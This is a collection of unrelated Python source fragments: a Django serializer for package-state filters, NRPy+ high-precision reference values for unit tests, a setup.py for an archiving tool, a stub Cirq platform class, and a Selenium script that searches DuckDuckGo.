choices=[
'CREATED',
'UPLOADING',
'PROCESSING',
'ONBOARDED'
]
),
help_text="Match PF Packages with particular PNF Onboarding State ",
allow_null=False,
required=False
)
pnfdUsageState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=['IN_USE', 'NOT_IN_USE']
),
help_text="Match PF Packages with particular PNF usage State",
allow_null=False,
required=False
)
|
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-08-09
trusted_values_dict['FishBoneMoncriefID__FishboneMoncriefID__globals'] = {'hm1': mpf('-0.17148595535307850240978200068542'), 'rho_initial': mpf('0.284819845942236515284909115898924'), 'IDalpha': mpf('0.755931060760646734042892329127751'), 'IDgammaDD[0][0]': mpf('2.0385167763522174725280879252921'), 'IDgammaDD[0][1]': mpf('0.0765438379382772951846664774808896'), 'IDgammaDD[0][2]': mpf('0.570539327433565151458524763213205'), 'IDgammaDD[1][0]': mpf('0.0765438379382772951846664774808896'), 'IDgammaDD[1][1]': mpf('0.913606065931442108137857582766233'), 'IDgammaDD[1][2]': mpf('-0.103931622633820480927404911622589'), 'IDgammaDD[2][0]': mpf('0.570539327433565151458524763213205'), 'IDgammaDD[2][1]': mpf('-0.103931622633820480927404911622589'), 'IDgammaDD[2][2]': mpf('1.40437373720499632990640350854066'), 'IDKDD[0][0]': mpf('0.241372059893883246591607766283272'), 'IDKDD[0][1]': mpf('-0.343388055113192085165370755198259'), 'IDKDD[0][2]': mpf('-0.590459359927831888413702466883995'), 'IDKDD[1][0]': mpf('-0.343388055113192085165370755198259'), 'IDKDD[1][1]': mpf('0.401858289197972155074762087828211'), 'IDKDD[1][2]': mpf('-0.422578171813805727676385503332614'), 'IDKDD[2][0]': mpf('-0.590459359927831888413702466883995'), 'IDKDD[2][1]': mpf('-0.422578171813805727676385503332614'), 'IDKDD[2][2]': mpf('-0.0139298788083103948797345044429905'), 'IDbetaU[0]': mpf('0.21464758255634547847210936078832'), 'IDbetaU[1]': mpf('0.241217364020809745026116799650538'), 'IDbetaU[2]': mpf('0.281800155328952481540896834563867'), 'IDValencia3velocityU[0]': mpf('-0.0100201358532234154260289073441603'), 'IDValencia3velocityU[1]': mpf('0.580690518031488621148890984890519'), 'IDValencia3velocityU[2]': mpf('0.372785522327121194734739936270058')}
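# Note (not part of the generated file): the NRPy+ unit-testing framework
# compares these stored reference values against freshly computed module
# globals at the precision set above; a mismatch at that precision is
# reported as a regression.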
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='budweiser',
version='0.1',
description='Distributed file archiving state machine for messy directories',
long_description='',
keywords='filesystem sync rsync archiving beer',
url='https://github.com/lukebeer/budweiser',
author='Luke Berezynskyj (Aka Beer)',
author_email='mail@luke.beer',
license='MIT',
include_package_data=True,
packages=find_packages(),
install_requires=[
'redis',
],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: System :: Archiving',
]
)
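# Installation sketch (standard setuptools workflow, not part of the original
# file): from the repository root run `pip install .`, or `pip install -e .`
# for an editable development install; both pull in the `redis` dependency.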
|
## _____ _____
## | __ \| __ \ AUTHOR: Pedro Rivero
## | |__) | |__) | ---------------------------------
## | ___/| _ / DATE: May 11, 2021
## | | | | \ \ ---------------------------------
## |_| |_| \_\ https://github.com/pedrorrivero
##
## Copyright 2021 Pedro Rivero
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from typing import Tuple
from ..circuit import QuantumCircuit
from ..job import QuantumJob
from ..platform import QuantumPlatform, QuantumProtocol
###############################################################################
## CIRQ PLATFORM
###############################################################################
class CirqPlatform(QuantumPlatform):
def __init__(self) -> None:
self.ERROR_MSG = f"{self.__class__.__name__}" # TODO
raise NotImplementedError(self.ERROR_MSG)
############################### PUBLIC API ###############################
@property
def job_partition(self) -> Tuple[int, int]:
raise NotImplementedError(self.ERROR_MSG)
@property
def max_bits_per_request_allowed(self) -> int:
raise NotImplementedError(self.ERROR_MSG)
def create_circuit(self, num_qubits: int) -> QuantumCircuit:
raise NotImplementedError(self.ERROR_MSG)
def create_job(
self, circuit: QuantumCircuit, repetitions: int
) -> QuantumJob:
raise NotImplementedError(self.ERROR_MSG)
def fetch_random_bits(self, protocol: QuantumProtocol) -> str:
raise NotImplementedError(self.ERROR_MSG)
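# Hedged sketch (not part of the original package) of how a concrete subclass
# might fill in one of these stubs using Cirq's public API; the subclass name
# is hypothetical, and the return value assumes cirq.Circuit satisfies the
# package's QuantumCircuit protocol:
#
#     import cirq
#
#     class SimulatedCirqPlatform(CirqPlatform):
#         def __init__(self) -> None:
#             pass  # bypass the stub __init__, which raises
#
#         def create_circuit(self, num_qubits: int) -> QuantumCircuit:
#             qubits = cirq.LineQubit.range(num_qubits)
#             return cirq.Circuit(cirq.measure(*qubits))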
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from shutil import which
import time
options = Options()
#options.add_argument("--headless")
chrome_path = which("chromedriver")
driver = webdriver.Chrome(executable_path=chrome_path, options=options)
driver.get("https://duckduckgo.com")
search_input = driver.find_element_by_id("search_form_input_homepage")
search_input.send_keys("My User Agent")
# search_btn = driver.find_element_by_id("search_button_homepage")
# search_btn.click()
search_input.send_keys(Keys.ENTER)
print(driver.page_source)
time.sleep(300)
driver.close()
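# Note (not in the original script): Selenium 4 removed the executable_path
# keyword used above. A rough Selenium 4 equivalent would be:
#
#     from selenium.webdriver.chrome.service import Service
#     driver = webdriver.Chrome(service=Service(chrome_path), options=options)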
|